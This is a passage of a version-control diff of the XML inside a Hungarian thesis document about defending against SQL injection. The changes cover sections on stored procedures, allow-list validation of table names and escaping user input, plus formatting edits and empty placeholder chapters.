-      <w:r>
-        <w:rPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -6242,7 +6004,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="1276"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -6269,69 +6031,30 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Mike Shema</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>2012</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc70610881"/>
-      <w:r>
+        <w:t xml:space="preserve"> [7]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Tárolt eljárások (stored procedures) használata</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6376,14 +6099,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ugyanolyan hatást gyakorolnak, mint a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>paraméterezett lekérdezések.</w:t>
+        <w:t>ugyanolyan hatást gyakorolnak, mint a paraméterezett lekérdezések.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6419,40 +6135,40 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z 1.2.2-es </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>példában</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és magában az adatbázisban tárolják, majd az alkalmazásból meghívják</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>alábbiakban</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
@@ -6469,27 +6185,28 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> és magában az adatbázisban tárolják, majd az alkalmazásból meghívják.</w:t>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B98FE05" wp14:editId="36869662">
-            <wp:extent cx="5040000" cy="1629336"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="3" name="Kép 3"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3073BAED" wp14:editId="5AD59E53">
+            <wp:extent cx="4267419" cy="1155759"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="4" name="Kép 4"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6509,7 +6226,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5040000" cy="1629336"/>
+                      <a:ext cx="4267419" cy="1155759"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6525,7 +6242,62 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.2.2-es ábra: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Java példa tárolt eljárásra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [8]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6535,13 +6307,221 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">1.2.2-es ábra: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Java példa tárolt eljárásra </w:t>
+        <w:t xml:space="preserve">Az SQL lekérdezések különböző részei </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">néha </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nem </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">alkalmasak </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>olyan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> változó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> használatára</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>amelye</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> érvényes utasítással vagy értékcímmel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>lehet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> helyettesíteni, hogy az utasítás sikeresen végrehajtható legyen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> („bind variables”).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ilyen helyzetekben a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bemenet </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ellenőrzése</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vagy a lekérdezés újratervezése a legmegfelelőbb védekezés.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z adatbázis </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>táblázat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ainak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vagy oszlop</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ainak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> neve esetén</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> például</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ideális esetben az értékek a kódból származnak, és nem a felhasználói paraméterekből.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Az alábbi példa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy cikluson belül </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">különböző ágakban vizsgálja a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6549,7 +6529,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
+        <w:t>t</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6557,37 +6537,146 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SQL Injection Prevention Cheat Sheet</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve">ableName </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>értékének lehetőségeit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, ezzel lekorlátozva az elérhető és lekérhető táblák számát.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="128F1A0E" wp14:editId="16E73905">
+            <wp:extent cx="4292821" cy="1384371"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="7" name="Kép 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4292821" cy="1384371"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc70610882"/>
-      <w:r>
-        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="14"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1.2.3-as ábra: Java példa adatbázis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tábl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a neveinek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ellenőrzésére </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[8]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6599,45 +6688,77 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc70610883"/>
-      <w:r>
-        <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="15"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ennek a technikának </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z egyszerű</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> célja, hogy elkerülje a felhasználói bevitelt, mielőtt lekérdezés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hez lehetne használni. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Alkalmazása</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a fenti módszerek megvalósíthatatlansága esetén kézenfekvő</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> lehet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, ám nem garancia az SQL injection megakadályozására</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, ún. végső lehetőséget biztosít</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6667,15 +6788,30 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
+        <w:ind w:left="284" w:hanging="284"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc70961906"/>
+      <w:r>
+        <w:t>GÉPI TANULÁS</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="284" w:hanging="284"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc70610884"/>
-      <w:r>
-        <w:t>GÉPI TANULÁS</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="16"/>
-    </w:p>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Stlus1"/>
@@ -6683,15 +6819,30 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
+        <w:ind w:left="284" w:hanging="284"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc70961907"/>
+      <w:r>
+        <w:t>PROGRAM FELÉPÍTÉSE</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="284" w:hanging="284"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc70610885"/>
-      <w:r>
-        <w:t>PROGRAM FELÉPÍTÉSE</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="17"/>
-    </w:p>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Stlus1"/>
@@ -6699,18 +6850,25 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
+        <w:ind w:left="284" w:hanging="284"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc70961908"/>
+      <w:r>
+        <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="14"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="284" w:hanging="284"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc70610886"/>
-      <w:r>
-        <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="18"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="259" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -6753,7 +6911,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc70610887"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc70961909"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6763,7 +6921,7 @@
         </w:rPr>
         <w:t>Irodalomjegyzék</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6816,7 +6974,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc70610888"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc70961910"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6826,7 +6984,7 @@
         </w:rPr>
         <w:t>Nyilatkozat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7001,7 +7159,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc70610889"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc70961911"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7011,7 +7169,7 @@
         </w:rPr>
         <w:t>Köszönetnyilvánítás</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7036,9 +7194,9 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId10"/>
-      <w:footerReference w:type="default" r:id="rId11"/>
-      <w:headerReference w:type="first" r:id="rId12"/>
+      <w:headerReference w:type="default" r:id="rId11"/>
+      <w:footerReference w:type="default" r:id="rId12"/>
+      <w:headerReference w:type="first" r:id="rId13"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>
@@ -7078,6 +7236,7 @@
         <w:docPartUnique/>
       </w:docPartObj>
     </w:sdtPr>
+    <w:sdtEndPr/>
     <w:sdtContent>
       <w:p>
         <w:pPr>
@@ -8856,6 +9015,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Bekezdsalapbettpusa">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Normltblzat">

</xml_diff>

<commit_message>
Last last last version
</commit_message>
<xml_diff>
--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -660,7 +660,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
